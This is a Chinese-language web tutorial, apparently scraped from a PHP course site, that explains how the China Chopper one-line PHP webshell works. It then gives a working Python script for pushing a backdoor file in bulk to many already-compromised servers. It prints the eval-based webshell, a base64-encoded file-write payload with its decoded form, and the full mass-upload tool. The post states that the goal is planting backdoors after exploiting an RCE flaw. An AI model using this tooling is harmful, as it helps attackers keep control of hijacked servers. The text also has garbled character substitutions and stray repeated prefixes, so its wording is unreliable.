《PHP應(yīng)用:PHP實(shí)現(xiàn)批量上傳單個(gè)文件》要點(diǎn):
本文介紹了PHP應(yīng)用:PHP實(shí)現(xiàn)批量上傳單個(gè)文件,希望對您有用。如果有疑問,可以聯(lián)系我們。
PHP編程很多時(shí)候當(dāng)我們通過某個(gè)通用型RCE漏洞批量抓取了很多的webshell后,可能想要批量傳個(gè)后門以備后用.這時(shí),我們不禁會面臨一個(gè)問題,使用菜刀一個(gè)個(gè)上傳顯得太慢,那么如何快速的實(shí)現(xiàn)文件的批量上傳呢?本文給年夜家介紹基于php如何實(shí)現(xiàn)這類需求.
PHP編程0×01 原理闡發(fā)
PHP編程首先,我們必需了解菜刀是如何通過一句話木馬來實(shí)現(xiàn)web服務(wù)器的文件管理的.
PHP編程下面是最常見的php一句話木馬:
PHP編程
<?php eval($_POST[1]); ?>
PHP編程當(dāng)我們將一句話木馬上傳到web服務(wù)器上后,我們就可以直接在菜刀中輸入上面的暗碼(如上例中的1)連接到服務(wù)器上來管理文件.
PHP編程那么,此處的菜刀如何通過簡單的一句話就可以實(shí)現(xiàn)對服務(wù)器的管理和控制呢?通過分析菜刀的原理,我們不難發(fā)現(xiàn)菜刀是利用了eval這個(gè)函數(shù)來執(zhí)行通過POST辦法傳過來的命令語句.
PHP編程因此,如果我們想通過菜刀一句話木馬來實(shí)現(xiàn)文件上傳的話,只需要向遠(yuǎn)程服務(wù)里上包含一句話的url發(fā)送一個(gè)帶文件寫入命令的POST哀求即可,比如:
PHP編程POST:
PHP編程1=@eval($_POST[z0]);&z0=echo $_SERVER['DOCUMENT_ROOT'];
PHP編程上面代碼包括2個(gè)部分:
PHP編程1. 一句話的暗碼
PHP編程2. 發(fā)送給服務(wù)器端的php執(zhí)行代碼
PHP編程既然知道原理了,我們只需要發(fā)送如下的POST哀求即可完成利用一句話上傳文件的功能:
PHP編程POST:
PHP編程1=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzsKJGY9JF9QT1NUWyJ6MSJdOwokYz0kX1BPU1RbInoyIl07CiRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOwokYz1zdHJfcmVwbGFjZSgiXG4iLCIiLCRjKTsKJGJ1Zj0iIjsKZm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MSkKICAgICRidWYuPXN1YnN0cigkYywkaSwxKTsKZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1ZikpOwplY2hvKCJ8PC0iKTsKZGllKCk7&z1=L3Zhci93d3cvcm9vdC8xLnR4dA==&z2=aGVsbG8gd29ybGQh
PHP編程仔細(xì)分析一下這段POST數(shù)據(jù)包括以下幾個(gè)部分:
PHP編程1. 首先是php一句話的暗碼1
PHP編程2. 通過eval辦法來執(zhí)行base64解碼后的z0,解碼整理后顯示如下:
PHP編程
@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo("->|");;
$f=base64_decode($_POST["z1"]);
$c=base64_decode($_POST["z2"]);
$c=str_replace("\r","",$c);
$c=str_replace("\n","",$c);
$buf="";
for($i=0;$i<strlen($c);$i+=1)
$buf.=substr($c,$i,1);
echo(@fwrite(fopen($f,"w"),$buf));
echo("|<-");
die();
PHP編程3. 在z0中繼續(xù)調(diào)用base64解碼后的z1和z2,解碼后如下:
PHP編程
z1=/var/www/root/1.txt
z2=hello world!
PHP編程至此,我們可以很清楚的發(fā)現(xiàn)上面的POST哀求的作用實(shí)際上是將一個(gè)寫有hello world!的名為1.txt的文件上傳至服務(wù)器上/var/www/root/路徑下.
PHP編程0×02 代碼實(shí)現(xiàn)
PHP編程基于上面的原理闡發(fā),我們可以利用下面的代碼基于php一句話來實(shí)現(xiàn)文件批量上傳:
PHP編程
#!/usr/bin/python
#coding=utf-8
import urllib
import urllib2
import sys
import base64
import re
def post(url, data):
req = urllib2.Request(url)
data = urllib.urlencode(data)
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())
response = opener.open(req, data)
return response.read()
def get_shell_path(posturl,passwd):
shell_path = ""
try:
data = {}
data[passwd] = '@eval(base64_decode($_POST[z0]));'
data['z0']='ZWNobyAkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ107'
shell_path = post(posturl, data).strip()
except Exception:
pass
return shell_path
def main():
print '\n+++++++++Batch Uploading Local File (Only for PHP webshell)++++++++++\n'
shellfile = sys.argv[1] # 存放webshell路徑和暗碼的文件
localfile = sys.argv[2] # 本地待上傳的文件名
shell_file = open(shellfile,'rb')
local_content = str(open(localfile,'rb').read())
for eachline in shell_file:
posturl = eachline.split(',')[0].strip()
passwd = eachline.split(',')[1].strip()
try:
reg = ".*/([^/]*\.php?)"
match_shell_name = re.search(reg,eachline)
if match_shell_name:
shell_name=match_shell_name.group(1)
shell_path = get_shell_path(posturl,passwd).strip()
target_path = shell_path.split(shell_name)[0]+localfile
target_path_base64 = base64.b64encode(target_path)
target_file_url = eachline.split(shell_name)[0]+localfile
data = {}
data[passwd] = '@eval(base64_decode($_POST[z0]));'
data['z0']='QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzsKJGY9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoxIl0pOwokYz1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejIiXSk7CiRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOwokYz1zdHJfcmVwbGFjZSgiXG4iLCIiLCRjKTsKJGJ1Zj0iIjsKZm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MSkKICAgICRidWYuPXN1YnN0cigkYywkaSwxKTsKZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1ZikpOwplY2hvKCJ8PC0iKTsKZGllKCk7'
data['z1']=target_path_base64
data['z2']=base64.b64encode(local_content)
response = post(posturl, data)
if response:
print '[+] '+target_file_url+', upload succeed!'
else:
print '[-] '+target_file_url+', upload failed!'
else:
print '[-] '+posturl+', unsupported webshell!'
except Exception,e:
print '[-] '+posturl+', connection failed!'
shell_file.close()
if __name__ == '__main__':
main()
PHP編程webshell.txt的格式: [一句話webshell文件路徑],[webshell連接暗碼]如下:
PHP編程http://www.example1.com/1.php, 1
PHP編程http://www.example2.com/1.php, 1
PHP編程http://www.example3.com/1.php, 1
PHP編程保留上面腳本為batch_upload_file.py,執(zhí)行命令python batch_upload_file.py webshell.txt 1.txt,效果顯示如下:
PHP編程
PHP編程以上內(nèi)容給年夜家介紹了PHP實(shí)現(xiàn)批量上傳單個(gè)文件的相關(guān)知識,希望年夜家喜歡.
《PHP應(yīng)用:PHP實(shí)現(xiàn)批量上傳單個(gè)文件》是否對您有啟發(fā),歡迎查看更多與《PHP應(yīng)用:PHP實(shí)現(xiàn)批量上傳單個(gè)文件》相關(guān)教程,學(xué)精學(xué)透。維易PHP學(xué)院為您提供精彩教程。
轉(zhuǎn)載請注明本頁網(wǎng)址:
http://www.fzlkiss.com/jiaocheng/7964.html